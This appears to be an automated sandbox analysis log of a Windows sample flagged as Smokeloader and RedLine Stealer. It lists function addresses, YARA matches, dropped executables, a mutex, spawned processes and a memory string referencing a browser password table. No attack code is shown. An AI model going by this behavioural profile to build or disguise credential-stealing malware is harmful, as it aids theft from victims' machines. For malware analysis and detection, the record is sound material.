        Source: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02102361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02102361
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02102605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02102605
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004280220_2_00428022
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004071AB0_2_004071AB
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004373D90_2_004373D9
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0042D4EE0_2_0042D4EE
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004274840_2_00427484
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004285600_2_00428560
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0043D6780_2_0043D678
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004166AF0_2_004166AF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004137250_2_00413725
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004277F60_2_004277F6
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0040E9740_2_0040E974
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0042EAE00_2_0042EAE0
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00427AA00_2_00427AA0
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00418AAF0_2_00418AAF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00436CBF0_2_00436CBF
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00427D670_2_00427D67
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00413F0B0_2_00413F0B
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021282890_2_02128289
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0212ED470_2_0212ED47
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021141720_2_02114172
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021276EB0_2_021276EB
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0212D7550_2_0212D755
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021287C70_2_021287C7
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02127A5D0_2_02127A5D
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0210EBDB0_2_0210EBDB
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021169160_2_02116916
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0211398C0_2_0211398C
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02136F260_2_02136F26
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02127FCE0_2_02127FCE
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02118D160_2_02118D16
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02127D070_2_02127D07
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0212ED470_2_0212ED47
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043D0D02_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00408A602_2_00408A60
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004223702_2_00422370
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00421B302_2_00421B30
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00418BA22_2_00418BA2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004378502_2_00437850
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041906A2_2_0041906A
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004260102_2_00426010
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004438E02_2_004438E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004180F02_2_004180F0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004438F92_2_004438F9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004438FB2_2_004438FB
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004278852_2_00427885
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041D8B02_2_0041D8B0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004069502_2_00406950
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004449502_2_00444950
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0040E16E2_2_0040E16E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0040D1722_2_0040D172
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043210B2_2_0043210B
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004039102_2_00403910
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004299172_2_00429917
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004061202_2_00406120
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0040B92C2_2_0040B92C
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042F1C12_2_0042F1C1
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004239EB2_2_004239EB
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004211802_2_00421180
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041618C2_2_0041618C
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043099F2_2_0043099F
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041F9A02_2_0041F9A0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041D1B02_2_0041D1B0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042E9B02_2_0042E9B0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041BA522_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043025E2_2_0043025E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042621B2_2_0042621B
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042BA202_2_0042BA20
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004172222_2_00417222
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00443A302_2_00443A30
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004042C02_2_004042C0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00443AC02_2_00443AC0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004302CD2_2_004302CD
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0040F2D02_2_0040F2D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004442E02_2_004442E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0040B2802_2_0040B280
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004352B02_2_004352B0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00402B402_2_00402B40
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00443B602_2_00443B60
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00409B702_2_00409B70
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00429B7B2_2_00429B7B
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042FB7D2_2_0042FB7D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00405B002_2_00405B00
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00440B002_2_00440B00
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00428B102_2_00428B10
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00419B302_2_00419B30
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00411BDE2_2_00411BDE
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004123EC2_2_004123EC
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00428C622_2_00428C62
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043C4602_2_0043C460
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043B4102_2_0043B410
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00441C262_2_00441C26
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00444C202_2_00444C20
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004064C02_2_004064C0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042F4E12_2_0042F4E1
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004324EE2_2_004324EE
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041D4A02_2_0041D4A0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00408D102_2_00408D10
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043E5202_2_0043E520
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00442DCA2_2_00442DCA
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00415DD82_2_00415DD8
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00425DA02_2_00425DA0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004085B02_2_004085B0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004096602_2_00409660
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00404E202_2_00404E20
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043C6C02_2_0043C6C0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043E6E02_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004186E52_2_004186E5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004446802_2_00444680
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0041DE902_2_0041DE90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043CE902_2_0043CE90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004287502_2_00428750
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043DF602_2_0043DF60
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00429F7C2_2_00429F7C
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004337072_2_00433707
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00402F102_2_00402F10
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004257132_2_00425713
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042F7162_2_0042F716
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004077302_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00427FC02_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004437D02_2_004437D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00433FDF2_2_00433FDF
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004127E02_2_004127E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042A7F02_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00434FF02_2_00434FF0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0042AF922_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021052572_2_02105257
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021042462_2_02104246
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210D3372_2_0210D337
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E83572_2_020E8357
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021023722_2_02102372
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D63872_2_020D6387
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020DD3D92_2_020DD3D9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020DE3D52_2_020DE3D5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F13E72_2_020F13E7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E603F2_2_020E603F
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D50872_2_020D5087
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210D0F72_2_0210D0F7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020EE0F72_2_020EE0F7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210E1C72_2_0210E1C7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E26532_2_020E2653
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210B6772_2_0210B677
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210C6C72_2_0210C6C7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020ED7072_2_020ED707
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D67272_2_020D6727
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021027552_2_02102755
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FF7482_2_020FF748
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210E7872_2_0210E787
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020ED4172_2_020ED417
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FF4282_2_020FF428
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021004C52_2_021004C5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020DB4E72_2_020DB4E7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021055172_2_02105517
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021005342_2_02100534
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D45272_2_020D4527
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020DF5372_2_020DF537
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021145472_2_02114547
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F25D72_2_020F25D7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E2A472_2_020E2A47
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FAA572_2_020FAA57
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02107AB72_2_02107AB7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F7B022_2_020F7B02
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020EDB172_2_020EDB17
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D3B772_2_020D3B77
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02114BB72_2_02114BB7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D6BB72_2_020D6BB7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D88172_2_020D8817
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D98C72_2_020D98C7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_021148E72_2_021148E7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210C9272_2_0210C927
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E79502_2_020E7950
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FF97D2_2_020FF97D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0210396E2_2_0210396E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D79972_2_020D7997
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F89B72_2_020F89B7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E1E452_2_020E1E45
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02114E872_2_02114E87
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D8F772_2_020D8F77
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020EFC072_2_020EFC07
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02100C062_2_02100C06
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FEC172_2_020FEC17
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F3C522_2_020F3C52
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FAC892_2_020FAC89
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FBC872_2_020FBC87
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020EBCB92_2_020EBCB9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D8CC72_2_020D8CC7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D5D672_2_020D5D67
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02110D672_2_02110D67
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020F1D972_2_020F1D97
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D2DA72_2_020D2DA7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020D9DD72_2_020D9DD7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020FFDE42_2_020FFDE4
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020E7DFA2_2_020E7DFA
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe 21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1831.tmp.exe 21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: String function: 00408280 appears 47 times
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: String function: 020E4E87 appears 145 times
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: String function: 020D84E7 appears 71 times
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: String function: 00414C20 appears 145 times
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: String function: 00410720 appears 53 times
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: String function: 0040F903 appears 36 times
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: String function: 02110987 appears 53 times
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: String function: 0040FDB2 appears 125 times
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: String function: 02110019 appears 121 times
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 1884
        Source: K27Yg4V48M.exeBinary or memory string: OriginalFileName vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exe, 00000000.00000003.2046097306.00000000032E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exe, 00000000.00000003.2015946504.0000000002170000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exe, 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exe, 00000000.00000000.2008140562.000000000045B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exe, 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exeBinary or memory string: OriginalFilenamesOriginal4 vs K27Yg4V48M.exe
        Source: K27Yg4V48M.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: K27Yg4V48M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 1831.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C07A6 CreateToolhelp32Snapshot,Module32First,0_2_020C07A6
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043D0D0
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6556
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile created: C:\Users\user\AppData\Local\Temp\1831.tmpJump to behavior
        Source: K27Yg4V48M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 1831.tmp.exe, 00000002.00000003.2078587945.0000000002F04000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078729550.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2094283040.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: K27Yg4V48M.exeReversingLabs: Detection: 50%
        Source: K27Yg4V48M.exeVirustotal: Detection: 43%
        Source: unknownProcess created: C:\Users\user\Desktop\K27Yg4V48M.exe "C:\Users\user\Desktop\K27Yg4V48M.exe"
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeProcess created: C:\Users\user\AppData\Local\Temp\1831.tmp.exe "C:\Users\user\AppData\Local\Temp\1831.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 1884
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeProcess created: C:\Users\user\AppData\Local\Temp\1831.tmp.exe "C:\Users\user\AppData\Local\Temp\1831.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: apphelp.dllJump to behavior
